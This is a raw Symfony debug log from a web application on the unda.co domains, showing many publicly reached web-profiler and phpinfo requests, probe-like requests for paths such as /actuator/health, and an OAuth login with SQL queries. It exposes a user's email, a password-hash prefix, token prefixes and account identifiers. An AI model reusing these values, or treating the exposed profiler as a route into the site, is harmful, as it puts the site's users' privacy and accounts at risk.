  5635. [2025-12-19 15:56:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b1d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e96b1d?panel=time","method":"GET"} []
  5636. [2025-12-19 15:56:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5637. [2025-12-19 15:56:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c?panel=security","method":"GET"} []
  5638. [2025-12-19 15:56:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5639. [2025-12-19 16:00:04] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://www.unda.co/_profiler/phpinfo","method":"GET"} []
  5640. [2025-12-19 16:06:37] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5641. [2025-12-19 16:06:38] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5642. [2025-12-19 16:12:03] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5643. [2025-12-19 16:13:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c?panel=request","method":"GET"} []
  5644. [2025-12-19 16:13:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5645. [2025-12-19 16:13:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5646. [2025-12-19 16:15:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c","method":"GET"} []
  5647. [2025-12-19 16:15:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  5648. [2025-12-19 16:16:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2705d1","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2705d1?panel=swiftmailer","method":"GET"} []
  5649. [2025-12-19 16:16:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  5650. [2025-12-19 16:26:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5651. [2025-12-19 16:26:58] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
  5652. [2025-12-19 16:29:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c?panel=twig","method":"GET"} []
  5653. [2025-12-19 16:29:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5654. [2025-12-19 16:32:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5655. [2025-12-19 16:39:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e41a6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e41a6f?panel=security","method":"GET"} []
  5656. [2025-12-19 16:39:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5657. [2025-12-19 16:44:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c?panel=time","method":"GET"} []
  5658. [2025-12-19 16:44:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5659. [2025-12-19 16:49:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5660. [2025-12-19 17:00:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c?panel=security","method":"GET"} []
  5661. [2025-12-19 17:00:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5662. [2025-12-19 17:05:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/health"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/health\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5663. [2025-12-19 17:06:39] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5664. [2025-12-19 17:17:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c?panel=request","method":"GET"} []
  5665. [2025-12-19 17:17:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5666. [2025-12-19 17:20:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f58fba","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f58fba?panel=logger","method":"GET"} []
  5667. [2025-12-19 17:20:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  5668. [2025-12-19 17:29:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=request","method":"GET"} []
  5669. [2025-12-19 17:29:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5670. [2025-12-19 17:30:43] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
  5671. [2025-12-19 17:31:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5672. [2025-12-19 17:31:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"501509","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/501509","method":"GET"} []
  5673. [2025-12-19 17:31:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5674. [2025-12-19 17:36:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1702ec","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/1702ec?panel=form","method":"GET"} []
  5675. [2025-12-19 17:36:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  5676. [2025-12-19 17:38:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"812b29","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/812b29?panel=request","method":"GET"} []
  5677. [2025-12-19 17:38:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5678. [2025-12-19 17:42:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8b8345","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8b8345?panel=validator","method":"GET"} []
  5679. [2025-12-19 17:42:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  5680. [2025-12-19 17:55:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3b11a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3b11a?panel=db","method":"GET"} []
  5681. [2025-12-19 17:55:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  5682. [2025-12-19 17:57:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5683. [2025-12-19 18:03:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException: "" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php line 90 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException(code: 0):  at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php:90)"} []
  5684. [2025-12-19 18:03:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5685. [2025-12-19 18:05:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d2c58d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d2c58d?panel=dump","method":"GET"} []
  5686. [2025-12-19 18:05:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  5687. [2025-12-19 18:06:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"259531","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/259531?group=1&panel=db","method":"GET"} []
  5688. [2025-12-19 18:06:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  5689. [2025-12-19 18:07:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dc8e7c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dc8e7c?panel=config","method":"GET"} []
  5690. [2025-12-19 18:07:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5691. [2025-12-19 18:11:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5692. [2025-12-19 18:19:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5693. [2025-12-19 18:20:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5694. [2025-12-19 18:23:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb19b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb19b2?panel=security","method":"GET"} []
  5695. [2025-12-19 18:23:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5696. [2025-12-19 18:28:57] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  5697. [2025-12-19 18:28:57] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  5698. [2025-12-19 18:28:57] doctrine.DEBUG: SELECT u0_.id AS id_0, u0_.uuid AS uuid_1, u0_.status AS status_2, u0_.date_created AS date_created_3, u0_.date_modified AS date_modified_4, u0_.name AS name_5, u0_.last_name AS last_name_6, u0_.email AS email_7, u0_.password AS password_8, u0_.media_path AS media_path_9, u0_.thumb_path AS thumb_path_10, u0_.curp AS curp_11, u0_.phone AS phone_12, u0_.email_verification AS email_verification_13, u0_.phone_verification AS phone_verification_14 FROM user u0_ WHERE (u0_.email = ?) AND (u0_.password = ?) LIMIT 1 ["mobile.apps@sondermut.com","bf87be12e7c044cfc97be37631 [...]"] []
  5699. [2025-12-19 18:28:57] doctrine.DEBUG: "START TRANSACTION" [] []
  5700. [2025-12-19 18:28:57] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"f9210a8b75c939133a6c922f6b [...]","3":"2025-12-19 18:58:57","4":"","5":456,"6":"[]"} []
  5701. [2025-12-19 18:28:57] doctrine.DEBUG: "COMMIT" [] []
  5702. [2025-12-19 18:28:57] doctrine.DEBUG: "START TRANSACTION" [] []
  5703. [2025-12-19 18:28:57] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"63e2cf27b48c10afbebee33c70 [...]","3":"2026-02-17 18:28:57","4":"","5":456,"6":"[]"} []
  5704. [2025-12-19 18:28:57] doctrine.DEBUG: "COMMIT" [] []
  5705. [2025-12-19 18:28:58] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=address%2Cnotification_setting%2Cresidential","method":"GET"} []
  5706. [2025-12-19 18:28:58] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5707. [2025-12-19 18:28:58] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5708. [2025-12-19 18:28:58] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5709. [2025-12-19 18:28:58] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5710. [2025-12-19 18:28:58] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["f9210a8b75c939133a6c922f6b [...]"] []
  5711. [2025-12-19 18:28:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [456] []
  5712. [2025-12-19 18:28:58] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"mobile.apps@sondermut.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5713. [2025-12-19 18:28:58] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5714. [2025-12-19 18:28:58] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5715. [2025-12-19 18:28:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["93846236-f8da-11ed-be56-02 [...]"] []
  5716. [2025-12-19 18:28:58] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [456,1] []
  5717. [2025-12-19 18:28:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [1] []
  5718. [2025-12-19 18:28:58] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [456,1] []
  5719. [2025-12-19 18:28:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["0e68cb7a-f1fe-4ab5-8725-99 [...]"] []
  5720. [2025-12-19 18:28:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [456,289] []
  5721. [2025-12-19 18:28:58] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  5722. [2025-12-19 18:29:00] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"0e68cb7a-f1fe-4ab5-8725-9966f6367196","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/0e68cb7a-f1fe-4ab5-8725-9966f6367196/invitation/20/0?order=desc","method":"GET"} []
  5723. [2025-12-19 18:29:00] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5724. [2025-12-19 18:29:00] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5725. [2025-12-19 18:29:00] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5726. [2025-12-19 18:29:00] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5727. [2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["f9210a8b75c939133a6c922f6b [...]"] []
  5728. [2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [456] []
  5729. [2025-12-19 18:29:00] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"mobile.apps@sondermut.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5730. [2025-12-19 18:29:00] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5731. [2025-12-19 18:29:00] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5732. [2025-12-19 18:29:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["0e68cb7a-f1fe-4ab5-8725-99 [...]"] []
